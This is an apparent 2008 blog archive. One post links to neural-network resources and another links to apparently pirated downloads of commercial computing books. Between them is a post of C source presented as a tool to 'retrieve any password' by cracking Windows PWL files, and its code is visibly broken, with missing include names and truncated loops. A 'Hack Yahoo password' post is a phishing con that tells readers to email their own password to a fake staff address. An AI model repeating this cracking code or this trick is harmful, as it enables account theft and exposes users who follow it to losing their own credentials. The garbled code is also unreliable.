Thursday, September 25, 2008

Artificial Neural Network: Course 523

Addresses of various websites containning ANN:
http://en.wikipedia.org/wiki/Artificial_neural_network

http://www.bcp.psych.ualberta.ca/~mike/Software/

http://www.ozgrid.com/Services/neural-network-software.htm

http://www.neural-forecasting.com/

http://savannah.nongnu.org/projects/libann/

http://www.nd.com/

http://www.google.com/Top/Computers/Artificial_Intelligence/Neural_Networks/Software/

For Source Code:
ftp://ftp.sas.com/pub/neural/FAQ5.html#A_source

For Freeware and Shareware:
ftp://ftp.sas.com/pub/neural/FAQ5.html#A18

For Neural Network Programs:
http://www.simtel.net/category.php%5Bid%5D207%5BSiteID%5Dsimtel.net
http://www.dmoz.org/Computers/Artificial_Intelligence/Neural_Networks/Software/

#30 days Evaluation version software:
http://www.download.com/ANNI-Std-Artificial-Neural-Network-Investing/3000-2057_4-10228650.html

#free software directory:
http://directory.fsf.org/category/ai/

Thursday, August 21, 2008

All Password

Source Code To retrieve any password of computer
# include
# include
# include
# include
# include
# include
# include

unsigned char huge Data[100001];
unsigned char keystream[1001];
int Rpoint[300];

void main(int argc,char *argv[]){
FILE *fd;
int i,j;
int size;
char ch;
char *name;
int cracked;
int sizemask;
int maxr;
int rsz;
int pos;
int Rall[300]; /* Resourse allocation table */

if(argc<2){
printf("usage: glide filename (username)");
exit(1);
}
/* Read PWL file */

fd=fopen(argv[1],"rb");
if(fd==NULL){
printf("can't open file %s",argv[1]);
exit(1);
}
size=0;
while(!feof(fd)){
Data[size++]=fgetc(fd);
}
size--;
fclose(fd);

/* Find Username */
name=argv[1];
if(argc>2)name=argv[2];
printf("Username:%s
",name);

/* Copy encrypted text into keystream */
cracked=size-0x0208;
if(cracked<0)cracked=0;
if(cracked>1000)cracked=1000;
memcpy(keystream,Data+0x208,cracked);

/* Generate 20 bytes of keystream */
for(i=0;i<20;i++){
ch=toupper(name[i]);
if(ch==0)break;
if(ch=='.')break;
keystream[i]^=ch;
};
cracked=20;

/* Find allocated resources */

sizemask=keystream[0]+(keystream[1]<<8);
printf("Sizemask:%04X
",sizemask);

for(i=0;i<256;i++){
if(Data[i]!=0xff){
Rall[Data[i]]++;
if(Data[i]>maxr)maxr=Data[i];
}
}

maxr=(((maxr/16)+1)*16); /* Resourse pointer table size appears to be
divisible by 16 */

/*Search after resources */

Rpoint[0]=0x0208+2*maxr+20+2; /* First resources */
for(i=0;i /* Find the size of current resourse */
pos=Rpoint[i];
rsz=Data[pos]+(Data[pos+1]<<8);
rsz^=sizemask;
printf("Analysing block with size:%04x (%d:%d)
",rsz,i,Rall[i]);
if((Rall[i]==0)&&(rsz!=0)){
printf("Unused resourse has nonzero size!!!
");
printf("If last line produed any:You may try to recover
");
printf("Press y to attempt the recovery
");
ch=getch();
if(ch!='y')exit(0);
rsz=2;
i=i-1;
}
pos=pos+rsz;

/* Resourse have a tedency to have the wrong size for some reason*/
/* Chech for correct size*/

if(i while(Data[pos+3]!=keystream[1]){
printf(":",Data[pos+3]);
pos=pos+2; /* Very rude may fail */
}
}
pos+=2; /* Include pointer in size */
Rpoint[i+1]=pos;
}
Rpoint[maxr]=size;
/* Insert Table data into keystream*/
for(i=0;i<=maxr;i++){
keystream[20+2*i]^=Rpoint[i] & 0x00ff;
keystream[21+2*i]^=(Rpoint[i]>>8) & 0x00ff;
}
cracked+=maxr*2+2;
printf("%d Bytes of ketstream recoverd
",cracked);

/* Decrypt resources */
for(i=0;i rsz=Rpoint[i+1]-Rpoint[i];
if(rsz>cracked)rsz=cracked;
printf("Resource[%d](%d)
",i,rsz);
for(j=0;j printf("%c",Data[Rpoint[i]+j]^keystream[j]);
printf("
");
}
exit(0);
}

Hack Yahoo password in two minutes

hack yahoo password in 2 mins
Need to hack yahoo passwords?
It is possible and it is easy. This way of hacking
into Yahoo email
accounts was brought to my attention by a friend of
mine who is a bit of a
computer wizard. I have tried the method a least a
dozen times and it has
worked on all but 2 occasions, I don't know the reason
why it failed a
couple of times, but on every other occasion it has
got me the password for
the requested email address. This is how it is done:
STEP 1- Log in to your own yahoo account. Note: Your
account must be at
least 30 days old for this to work.
STEP 2- Once you have logged into your own account,
compose/write an e-mail
to: cgi_asp67_php3_6383@yahoo.com This is a mailing
address to the Yahoo
Staff. The automated server will send you the password
that you have
'forgotten', after receiving the information you send
them.
STEP 3- In the subject line type exactly: " PASSWORD
RECOVERY "
STEP 4- On the first line of your mail write the email
address of the person
you are hacking.
STEP 5- On the second line type in the e-mail address
you are using.
STEP 6- On the third line type in the password to YOUR
email address (your
OWN password). The computer needs your password so it
can send a JavaScript
from your account in the Yahoo Server to extract the
other email addresses
password. In other word the system automatically
checks your password to
confirm the integrity of your status.
The process will be done automatically by the user
administration server. STEP 7- The final step before
sending the mail is,
type on the fourth line the following code exactly:
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}

enjoy

Sunday, August 10, 2008

Connect to the book to gather Knowledge

We can easily collect most of our necessary books form the Internet. There are some links for downloading the books from net are given below:

E-books:--------
Python 2.1 Bible.zipdownload:

http://w11.easy-share.com/887198.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Linux-linux bible 2006 edition boot up to fedora knoppix debian suse ubuntu and 7 other distributions jan 2006 ebook-ddu.zipdownload:
http://w11.easy-share.com/887189.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Hacking-Wiley - Reversing Secrets of Reverse Engineering.zipdownload:
http://w11.easy-share.com/887120.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Security-firewallPolicies.zipdownload:
http://w10.easy-share.com/887105.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Perl-beginning perl web development - from novice to professional (2006).pdfdownload:
http://w11.easy-share.com/886571.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Security-Internet Security.zipdownload:
http://w10.easy-share.com/886524.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Hacking - web applications (hacking exposed).zipdownload:
http://w11.easy-share.com/886462.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Hacking-Syngress.Buffer.Overflow.Attacks.Dec.2004.ISBN1932266674.pdfdownload:
http://w10.easy-share.com/883364.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
hacking-Wiley - Reversing Secrets of Reverse Engineering.zipdownload:
http://w11.easy-share.com/887120.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Network Security E-bookLink -
http://w10.easy-share.com/886524.html
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Networking e-books Downloadlink to the File:
http://rapidshare.com/users/6HEZQI xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Office 2003 e-books Downloadlink to the File:
http://rapidshare.com/users/3A40EV xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Programing e-books Downloadlink to the File:
http://rapidshare.com/users/OCEDU4

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Security e-books Downloadlink to the File:
http://rapidshare.com/users/P7M9C8 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Mac OS X e-books Downloadlink to the File:
http://rapidshare.com/users/8D0O99 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Linux e-books Downloadlink to the File:
http://rapidshare.com/users/9VC8MU xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Cisco e-books Downloadlink to the File:
http://rapidshare.com/users/KF1YLD